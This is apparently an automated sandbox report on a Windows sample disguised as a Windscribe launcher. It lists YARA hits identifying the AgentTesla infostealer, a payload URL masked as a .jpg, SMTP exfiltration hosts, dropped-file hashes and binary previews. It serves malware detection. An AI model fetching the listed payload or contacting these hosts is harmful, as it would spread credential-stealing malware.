          http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg9Mytlggh.Properties.ResourcesSCsupumbveaihwmgvdfi100%Avira URL Cloudmalware
          http://mx.mf.netgate.com.uy0%Avira URL Cloudsafe
          http://WmuGtz.com0%Avira URL Cloudsafe
          23.105.131.1960%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
          http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
          http://bmn.lpmpbanten.id100%Avira URL Cloudmalware
          http://mail.elparque.com.uy0%Avira URL Cloudsafe
          https://api.ipify.org%%startupfolder%0%URL Reputationsafe
          https://api.ipify.org%0%URL Reputationsafe
          http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg100%Avira URL Cloudmalware
          127.0.0.10%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          bmn.lpmpbanten.id
          103.8.79.204
          truetrue
            unknown
            mx.mf.netgate.com.uy
            200.40.119.50
            truetrue
              unknown
              mail.elparque.com.uy
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                23.105.131.196true
                • Avira URL Cloud: safe
                unknown
                http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpgtrue
                • Avira URL Cloud: malware
                unknown
                127.0.0.1true
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://127.0.0.1:HTTP/1.1Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg9Mytlggh.Properties.ResourcesSCsupumbveaihwmgvdfiOCBC_BAN.EXE, windscribe.exe.0.drtrue
                • Avira URL Cloud: malware
                unknown
                http://mx.mf.netgate.com.uyPubrtkzyqpdcef1.exe, 00000009.00000002.634961619.000000000349E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://stackoverflow.com/q/14436606/23354OCBC_BAN.EXE, 00000000.00000002.535692685.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://WmuGtz.comPubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://stackoverflow.com/q/2152978/23354rCannotOCBC_BAN.EXE, 00000000.00000002.535692685.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://stackoverflow.com/q/11564914/23354;OCBC_BAN.EXE, 00000000.00000002.535692685.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwPubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://DynDns.comDynDNSnamejidpasswordPsi/PsiPubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://bmn.lpmpbanten.idOCBC_BAN.EXE, 00000000.00000002.535616448.0000000002B91000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://mail.elparque.com.uyPubrtkzyqpdcef1.exe, 00000009.00000002.634961619.000000000349E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ipify.org%%startupfolder%Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      low
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOCBC_BAN.EXE, 00000000.00000002.535616448.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://api.ipify.org%Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        low
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        200.40.119.50
                        mx.mf.netgate.com.uyUruguay
                        6057AdministracionNacionaldeTelecomunicacionesUYtrue
                        103.8.79.204
                        bmn.lpmpbanten.idIndonesia
                        58551IDNIC-MTN-AS-IDPTMediatamaTelematikaNusantaraIDtrue
                        23.105.131.196
                        unknownUnited States
                        396362LEASEWEB-USA-NYC-11UStrue
                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:623417
                        Start date and time: 10/05/202214:45:592022-05-10 14:45:59 +02:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 11m 56s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:OCBC_BAN.EXE
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:20
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@10/5@3/3
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HDC Information:
                        • Successful, ratio: 0.1% (good quality ratio 0%)
                        • Quality average: 50%
                        • Quality standard deviation: 44.3%
                        HCA Information:
                        • Successful, ratio: 97%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .EXE
                        • Adjust boot time
                        • Enable AMSI
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                        • Execution Graph export aborted for target OCBC_BAN.EXE, PID 4500 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: OCBC_BAN.EXE
                        TimeTypeDescription
                        14:48:00API Interceptor455x Sleep call for process: Pubrtkzyqpdcef1.exe modified
                        14:48:27API Interceptor344x Sleep call for process: OCBC_BAN.EXE modified
                        No context
                        No context
                        No context
                        No context
                        No context
                        Process:C:\Users\user\Desktop\OCBC_BAN.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:modified
                        Size (bytes):847
                        Entropy (8bit):5.35816127824051
                        Encrypted:false
                        SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                        MD5:31E089E21A2AEB18A2A23D3E61EB2167
                        SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                        SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                        SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                        Malicious:true
                        Reputation:moderate, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                        Process:C:\Users\user\Desktop\OCBC_BAN.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):213504
                        Entropy (8bit):6.064450389025509
                        Encrypted:false
                        SSDEEP:6144:pF+NaNYd62YXxU+RWaVswlPH5XfIrijRpS:pF+Na2dXYXzH5X5N
                        MD5:4AD411F172F9362BB859CD369E5F3F8E
                        SHA1:3CBD02B7847D7259274F145B1BBD5F6206FD98F2
                        SHA-256:01E3C7651589A572C90A38AA1476BF4A50CCD35383FE3114BE11068D5C2A9E39
                        SHA-512:F2550C12826A47AF942674295DFDA205EC9C78090646C788618A6F4573135BD1BC9EEA05088667B5EBABDD725368DD28F4CFD6E5E175BF14DE200558F739784D
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, Author: Joe Security
                        • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, Author: ditekSHen
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: Metadefender, Detection: 37%, Browse
                        • Antivirus: ReversingLabs, Detection: 85%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....sb.................8...........V... ........@.. ....................................@..................................V..O....`..0............................................................................ ............... ..H............text....7... ...8.................. ..`.rsrc...0....`.......:..............@..@.reloc...............@..............@..B.................V......H.......d...H.............................................................(....*..(....*.s.........s.........s.........s.........*...0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0............+......,........,........,.+.+...(....(....*...0..(.........+......,........,........,.+.+..(....*.0..,.......
                        Process:C:\Users\user\Desktop\OCBC_BAN.EXE
                        File Type:ISO-8859 text, with no line terminators
                        Category:dropped
                        Size (bytes):8
                        Entropy (8bit):3.0
                        Encrypted:false
                        SSDEEP:3:hDl:hR
                        MD5:832F2F5C81D72A07024A36A79123F2B7
                        SHA1:465129A561D6FE73A2B7D3CC59474353C023ABA9
                        SHA-256:01C03F65A92E5700D89800AD7D410DE0B0027A4E768B6B269B2A4404B87B215B
                        SHA-512:C95FB1279878EB9DE4773F433F147DC9373A5F0307977D2B0D9E8786BB2B29BA11BBF47B06902DC111F5668DAE6EAA15B60B4D82BE488928D0C1BCFB6463AA4A
                        Malicious:true
                        Preview:X....2.H
                        Process:C:\Users\user\Desktop\OCBC_BAN.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):25088
                        Entropy (8bit):4.239777799948537
                        Encrypted:false
                        SSDEEP:192:M+fFPxnDgmvb3J7uyDTIJ1/DWzFCOmNEvNesGGE/:dfFO2rJ6yDMJ1/i0SvNesI
                        MD5:BE7BB1D25F6FB1B424AB8B54DC3971D0
                        SHA1:73E4DCB20A351F5D7332AC2383FCE657F22906B2
                        SHA-256:353FB33F1EE908DA348B403A829F36AD6F6BD0AA3022BC56F0542F9197266B20
                        SHA-512:2B637EDDAF731E348064E4CF61F3C8DB9888E52C75141DE89F157102385DA300CC7439E5029CE80551BFFA51261E33A82ED1A5AB2BC2C7EF16F97788B6699EC8
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 32%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....yb.....................L.......3... ........@.. ....................................@.................................<3..O....@...J........................................................................... ............... ..H............text........ ...................... ..`.rsrc....J...@...J..................@..@.reloc...............`..............@..B................p3......H.......,$..............t#..............................................F...-.&(....+.&+.*...0..*........r...p(.....-.+...(.....-.&+.&+..+..+..+.*...0..P.......s.....-.+A..i.,.&+..+..+......+..%.Y.,.&....+.o....+..-.+..+..o....(...+.+.&+..*.0..v....... .....-.&..(....+.&....-.&+D.+..s....(.....-.+B.o....o....s.....+..+..(..... ....o........o................-...+.&+..*....................E..Y......F...-.&(....+.&+.*^.-..-.+.(....+.(....+.*F...-.&(....+.&+.*.0..P.......~.......
                        Process:C:\Users\user\Desktop\OCBC_BAN.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:false
                        Preview:[ZoneTransfer]....ZoneId=0
                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):4.239777799948537
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:OCBC_BAN.EXE
                        File size:25088
                        MD5:be7bb1d25f6fb1b424ab8b54dc3971d0
                        SHA1:73e4dcb20a351f5d7332ac2383fce657f22906b2
                        SHA256:353fb33f1ee908da348b403a829f36ad6f6bd0aa3022bc56f0542f9197266b20
                        SHA512:2b637eddaf731e348064e4cf61f3c8db9888e52c75141de89f157102385da300cc7439e5029ce80551bffa51261e33a82ed1a5ab2bc2c7ef16f97788b6699ec8
                        SSDEEP:192:M+fFPxnDgmvb3J7uyDTIJ1/DWzFCOmNEvNesGGE/:dfFO2rJ6yDMJ1/i0SvNesI
                        TLSH:04B29401F544C3B0E3A5167778DDB18CE2AE9C2D121BAA9AF4907D5C1A722C11EF687C
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....yb.....................L.......3... ........@.. ....................................@................................
                        Icon Hash:66e4c8dae0ccd4d6
                        Entrypoint:0x40338e
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x6279C785 [Tue May 10 02:01:41 2022 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x333c0x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x4a00.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x13940x1400False0.5751953125data5.58241823662IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rsrc0x40000x4a000x4a00False0.142630912162data3.57733533525IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0xa0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x41300x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                        RT_GROUP_ICON0x83580x14data
                        RT_VERSION0x836c0x3aedata
                        RT_MANIFEST0x871c0x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        DLLImport
                        mscoree.dll_CorExeMain
                        DescriptionData
                        Translation0x0000 0x04b0
                        LegalCopyrightCopyright (C) 2021 Windscribe Limited
                        Assembly Version2.0.3.16
                        InternalNameWaxhxbwa.exe
                        FileVersion2.0.3.16
                        CompanyNameWindscribe Limited
                        LegalTrademarks
                        CommentsWindscribe Launcher
                        ProductNameWindscribe
                        ProductVersion2.0.3.16
                        FileDescriptionWindscribe Launcher
                        OriginalFilenameWaxhxbwa.exe
                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        103.8.79.204192.168.2.680497372848901 05/10/22-14:47:14.568526TCP2848901ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...)8049737103.8.79.204192.168.2.6
                        192.168.2.6200.40.119.50497865872030171 05/10/22-14:48:16.817585TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49786587192.168.2.6200.40.119.50
                        TimestampSource PortDest PortSource IPDest IP
                        May 10, 2022 14:47:11.899657011 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.075635910 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.075766087 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.076750040 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.252244949 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.252577066 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.252599955 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.252616882 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.252634048 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.252684116 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.252707005 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.252724886 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.252743006 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.252744913 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.252804995 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.252835035 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.252852917 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.252943993 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.428878069 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.428913116 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.428930998 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.428949118 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.428966045 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.428982019 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429002047 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429016113 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.429020882 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429039955 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429055929 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429070950 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.429075003 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429092884 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429110050 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429126978 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429132938 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.429146051 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429163933 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429172039 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.429182053 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429194927 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.429200888 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429219007 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429227114 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.429239988 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.429250956 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.429311037 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.605308056 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605350971 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605377913 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605406046 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605423927 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.605433941 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605462074 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605490923 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605505943 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.605516911 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605544090 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605552912 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.605571032 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605576038 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.605597019 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605619907 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.605623960 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605652094 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605668068 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.605679035 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605705976 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605725050 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.605732918 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605772018 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605781078 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.605811119 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605846882 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605859995 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.605875015 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605904102 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605921030 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.605928898 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605957031 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.605971098 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.605986118 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.606021881 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.606031895 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.606060982 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.606091022 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.606108904 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.606122017 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.606157064 CEST8049737103.8.79.204192.168.2.6
